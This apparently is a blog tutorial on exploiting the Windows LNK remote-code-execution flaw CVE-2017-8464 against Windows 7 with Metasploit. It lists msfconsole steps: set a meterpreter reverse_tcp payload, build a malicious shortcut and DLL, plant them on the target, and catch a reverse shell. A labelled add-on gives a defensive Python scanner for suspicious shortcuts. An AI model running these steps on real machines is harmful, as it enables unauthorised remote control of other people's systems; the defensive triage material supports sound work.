Hello, wonderful people! This is your friend, Ashish. Today, we'll hack a Windows 7 machine with a relatively new vulnerability called LNK RCE in Windows. Being a white hat, I have to stay in the practice not only of finding new vulnerabilities but also of learning how newly discovered vulnerabilities are exploited. And that's what I want from you wonderful hackers!
Always go for exploit-db.
It has a huge variety of stuff out there for you, such as exploits, white papers, and other worthy stuff.
Where Did I Get This CVE From?
I was just searching for a newly discovered vulnerability and found this one on exploit-db. Here's the link: cve-2017-8464
Before jumping into the exploit, let's first understand what a .LNK file is. It is basically a shortcut which, behind the scenes, points to an executable. I am sure you have seen one somewhere or another on your system!
What Does This Exploit Actually Exploit?
About the CVE: This vulnerability exists in the Windows shell and allows a remote attacker or a local user to execute commands on the machine using a specially crafted LNK file. With this, you can exploit the following systems: Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016. Today, we'll exploit a Windows 7 machine!
And that too with Metasploit.
Put simply, this kind of vulnerability comes from not properly handling data or input. In this case, the parser, Windows File Explorer, fails to handle the shortcut's data properly, and the result is an RCE.
Setup: Windows 7 (target machine), Linux (attacker machine) with Metasploit installed.
1. Download the exploit and add it to Metasploit. If you don't know how to add it, have a look at the video on my YouTube channel: How to add exploit to Metasploit
2. Now, open up msfconsole and use the added exploit. Command: use exploit/windows/exploitname
3. Use a meterpreter payload and get a meterpreter shell. Command: set payload windows/meterpreter/reverse_tcp
4. Now, the most important part: creating the lnk shortcut. We'll use the exploit to create an lnk for any drive except C:. In this case, I'll build the E: drive lnk, and after building the targeted lnk, I'll copy both the lnk and a dll file to the target host, and boom, exploited. Commands: first add your IP and port to the payload with set LHOST <your ip> and set LPORT <your port>, then type exploit and press Enter. At this point, your files will be created like this:
5. Now, close all your terminal windows and open another msfconsole. This time, use the exploit multi/handler and add the previous payload to it with your IP and port. Commands: use exploit/multi/handler, set payload windows/meterpreter/reverse_tcp, set LHOST <your ip>, set LPORT <your port>.
After you've successfully copied the right lnk and dll to your target, go back to the terminal, type exploit and press Enter. BOOM BOOM BOOM BOOM... Exploited, and thus you've gained a reverse tcp shell:
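The flip side for defenders: the attack above always drops a shortcut next to a DLL on the same drive, so a quick triage scanner that flags .lnk files naming a DLL that sits beside them gives incident responders a lead when checking a suspicious USB stick or share. This is an added example, not code from the original post or from Metasploit; it only checks the fixed LNK header and searches for DLL names, it is not a full MS-SHLLINK parser, and the sample shortcut it builds is a constructed stand-in.

```python
"""Heuristic triage for LNK shortcuts that name a DLL sitting beside them.
Added example (not the post's or Metasploit's code). Hits are leads to
inspect, not verdicts: no full MS-SHLLINK parsing is done here.
"""
import re
import tempfile
from pathlib import Path
from typing import List, Optional

# Fixed first 20 bytes of every MS-SHLLINK file: HeaderSize 0x4C followed by
# the ShellLink CLSID 00021401-0000-0000-C000-000000000046 (little-endian).
LNK_MAGIC = bytes.fromhex("4c000000" "01140200" "00000000" "c000000000000046")
# DLL file names as they appear in ANSI and in UTF-16LE string data.
_ASCII_DLL = re.compile(rb"[\w\-. ]+\.dll", re.IGNORECASE)
_WIDE_DLL = re.compile(rb"(?:[\w\-. ]\x00)+\.\x00d\x00l\x00l\x00", re.IGNORECASE)

def is_lnk(data: bytes) -> bool:
    """True when the blob starts with the ShellLink header."""
    return data.startswith(LNK_MAGIC)

def referenced_dlls(data: bytes) -> List[str]:
    """Lower-cased DLL names embedded in the shortcut, found by string search."""
    names = {m.group(0).decode("ascii", "ignore") for m in _ASCII_DLL.finditer(data)}
    names |= {m.group(0).decode("utf-16-le", "ignore") for m in _WIDE_DLL.finditer(data)}
    return sorted({n.strip().lower() for n in names})

def triage_lnk_file(path: Path) -> Optional[dict]:
    """Report a .lnk that names DLLs, and which of those sit beside it on disk."""
    data = path.read_bytes()
    dlls = referenced_dlls(data) if is_lnk(data) else []
    present = [d for d in dlls if (path.parent / d).is_file()]
    return {"lnk": path.name, "dlls": dlls, "dll_beside_lnk": present} if dlls else None

def scan_directory(root: Path) -> List[dict]:
    """Walk a drive root (for example a mounted USB stick) and collect hits."""
    results = [triage_lnk_file(p) for p in sorted(root.rglob("*.lnk"))]
    return [r for r in results if r]

def build_sample_lnk(dll_name: str) -> bytes:
    """Constructed stand-in for a crafted shortcut: real header, dummy body."""
    return LNK_MAGIC + b"\x00" * 56 + dll_name.encode("utf-16-le") + b"\x00\x00"

def demo_scan() -> List[dict]:
    """Self-contained run: write a sample .lnk plus its DLL to a temp dir, scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "E.lnk").write_bytes(build_sample_lnk("payload.dll"))
        (root / "payload.dll").write_bytes(b"MZ")  # constructed placeholder DLL
        (root / "clean.lnk").write_bytes(LNK_MAGIC + b"\x00" * 56)  # no DLL named
        return scan_directory(root)
```

On a case-insensitive Windows volume the beside-check will also match names differing only in case; on Linux it compares the lower-cased name literally.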
If you are not able to grasp much from this, have a look at my video: How to hack any Windows machine
Hack like a pro and keep practicing!